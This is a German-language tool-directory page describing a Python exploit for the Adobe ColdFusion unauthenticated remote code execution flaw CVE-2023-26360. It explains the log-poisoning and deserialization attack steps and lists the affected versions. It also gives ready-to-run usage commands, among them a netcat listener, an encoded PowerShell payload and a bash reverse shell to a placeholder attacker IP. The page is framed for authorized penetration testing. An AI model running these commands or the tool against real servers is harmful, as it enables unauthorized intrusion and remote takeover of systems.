Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Adobe_ColdFusion_RCE_Unauthenticated — Dieser Exploit basiert auf CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) und wurde auf Basis des Metasploit-Moduls und des jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit erstellt. | Kitploit
Tools/GitHubGitHub/joaoaugustom/adobe_coldfusion_rce_unauthenticated
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubjoaoaugustom/adobe_coldfusion_rce_unauthenticated

Adobe_ColdFusion_RCE_Unauthenticated

Dieser Exploit basiert auf CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) und wurde auf Basis des Metasploit-Moduls und des jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit erstellt.

Repository anzeigen
11vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-26360 — Adobe ColdFusion Nicht authentifizierter RCE

Python-Implementierung des Remote-Code-Execution-Exploits für CVE-2023-26360, basierend auf der Analyse des ursprünglichen Metasploit-Moduls und der vorherigen Arbeit von jakabakos.

Warum dieses Tool existiert

Der jakabakos-PoC versucht, <cfexecute> direkt in den _variables-Parameter zu injizieren und die Ausgabe aus dem ColdFusion-Log in einem einzigen Schritt zu lesen. Dieser Ansatz schlägt fehl, da ColdFusion CFML-Tags in diesem Kontext nicht inline auswertet, was zu einem 500-Fehler ohne Codeausführung führt.

Diese Implementierung repliziert den korrekten Zwei-Schritt-Mechanismus, der vom Metasploit-Modul verwendet wird:

  1. Log-Poisoning — sendet eine fehlerhafte _variables-Payload ({<cftry>CFML</cftry>) an den verwundbaren CFC-Endpunkt. ColdFusion kann sie nicht parsen und schreibt den Rohinhalt – einschließlich des CFML-Codes – in .
coldfusion-out.log
  • Template-Ausführung — nutzt die Classname-Deserialisierungsschwachstelle, um die vergiftete Logdatei als ColdFusion-Template zu laden, sodass der Server das injizierte CFML ausführt.
  • Die Befehlsausführung erfolgt über java.lang.Runtime.exec() via createObject, wodurch jede Abhängigkeit von <cfexecute> vermieden wird, das in abgesicherten oder Produktionsumgebungen typischerweise deaktiviert ist.

    Betroffene Versionen

    • Adobe ColdFusion 2021 Update 5 und früher
    • Adobe ColdFusion 2018 Update 15 und früher

    Voraussetzungen

    root@kitploit:~
    pip install -r requirements.txt
    

    Verwendung

    Starten Sie vor der Ausführung des Exploits einen Listener:

    root@kitploit:~
    nc -lvnp 4444
    

    Windows-Ziel:

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"
    

    Linux-Ziel:

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
    

    Über einen Proxy (z.B. Burp Suite):

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080
    

    Optionen

    FlagBeschreibung
    --hostBasis-URL des Ziels (z.B. http://192.168.1.10:8500)
    --cmdAuszuführender Befehl auf dem Ziel
    --winSetzen Sie dieses Flag, wenn es sich um ein Windows-Ziel handelt
    --proxyOptionale HTTP-Proxy-URL

    Funktionsweise

    root@kitploit:~
    ┌─────────────┐         Schritt 1: CFML einpflanzen  ┌──────────────────┐
    │   Angreifer  │ ──── POST /_variables={<cftry>...  ──► iedit.cfc        │
    │             │      CF kann nicht parsen, loggt CFML │                  │
    │             │                                       │ coldfusion-      │
    │             │         Schritt 2: Auslösung          │ out.log          │
    │             │ ──── POST classname=X..\logs\cf... ──► (als CFML-        │
    │             │                                       │  Template geladen)│
    │  Listener   │ ◄─────────────── Reverse Shell ───────│                  │
    └─────────────┘                                       └──────────────────┘
    

    Referenzen

    • Adobe Sicherheitshinweis
    • Rapid7 Analyse — AttackerKB
    • Metasploit-Modul
    • jakabakos PoC

    Haftungsausschluss

    Dieses Tool wird ausschließlich zu Bildungszwecken und für autorisierte Sicherheitsbewertungen bereitgestellt (Penetrationstests, CTFs, Laborumgebungen). Das Ausführen dieses Exploits gegen Systeme ohne ausdrückliche schriftliche Genehmigung ist illegal. Der Autor übernimmt keine Haftung für Missbrauch.

    Tool herunterladen